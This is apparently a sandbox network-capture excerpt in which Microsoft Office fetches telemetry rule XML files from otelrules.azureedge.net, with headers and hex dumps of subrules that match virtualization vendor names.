                                                                            2024-10-28 08:37:12 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            89192.168.2.44986113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:11 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:12 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:11 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 419
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                            ETag: "0x8DC582B9C710B28"
                                                                            x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083711Z-16849878b78j5kdg3dndgqw0vg00000006fg000000007c0r
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            90192.168.2.44986313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:12 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:12 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:12 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 419
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                            ETag: "0x8DC582BB7F164C3"
                                                                            x-ms-request-id: 57989b77-d01e-0049-621c-27e7dc000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083712Z-16849878b78km6fmmkbenhx76n000000043g000000007prp
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            91192.168.2.44986513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:12 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:12 UTC471INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:12 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 419
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                            ETag: "0x8DC582B9FF95F80"
                                                                            x-ms-request-id: 14980f11-e01e-00aa-5d14-29ceda000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083712Z-r197bdfb6b46kdskt78qagqq1c00000004u0000000006vqy
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_MISS
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:12 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            92192.168.2.44986413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:12 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:12 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:12 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 477
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                            x-ms-request-id: a1cd7d15-b01e-0070-762b-271cc0000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083712Z-16849878b78km6fmmkbenhx76n0000000430000000008e0t
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:12 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            93192.168.2.44986613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:12 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:12 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:12 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 472
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                            ETag: "0x8DC582BB650C2EC"
                                                                            x-ms-request-id: c2db9b5f-901e-0015-105a-27b284000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083712Z-16849878b7898p5f6vryaqvp5800000005hg000000009zv5
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:12 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            94192.168.2.44986713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:12 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:12 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:12 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 468
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                            ETag: "0x8DC582BB3EAF226"
                                                                            x-ms-request-id: 1c275e9e-901e-0048-342c-26b800000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083712Z-r197bdfb6b4hsj5bywyqk9r2xw0000000650000000004wkg
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:12 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            95192.168.2.44986813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:13 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:13 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:13 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 485
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                            ETag: "0x8DC582BB9769355"
                                                                            x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083713Z-15b8d89586f8nxpt6ys645x5v0000000060000000000394k
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:13 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            96192.168.2.44986913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:13 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:13 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:13 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 411
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                            ETag: "0x8DC582B989AF051"
                                                                            x-ms-request-id: 75bf4e1c-f01e-0085-073a-2688ea000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083713Z-r197bdfb6b4zd9tpkpdngrtchw000000044g000000000vwh
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:13 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            97192.168.2.44987013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:13 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:13 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:13 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 470
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                            ETag: "0x8DC582BBB181F65"
                                                                            x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083713Z-16849878b78j5kdg3dndgqw0vg00000006fg000000007c1s
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:13 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            98192.168.2.44987213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:13 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:13 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:13 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 502
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                            ETag: "0x8DC582BB6A0D312"
                                                                            x-ms-request-id: fc13fe58-401e-000a-0af3-244a7b000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083713Z-15b8d89586f42m673h1quuee4s00000008r000000000b51q
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:13 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            99192.168.2.44987113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:13 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:13 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:13 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 427
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                            ETag: "0x8DC582BB556A907"
                                                                            x-ms-request-id: fd10a765-001e-002b-6c44-2899f2000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083713Z-15b8d89586fhl2qtatrz3vfkf00000000ang00000000a3su
                                                                            x-fd-int-roxy-purgeid: 0
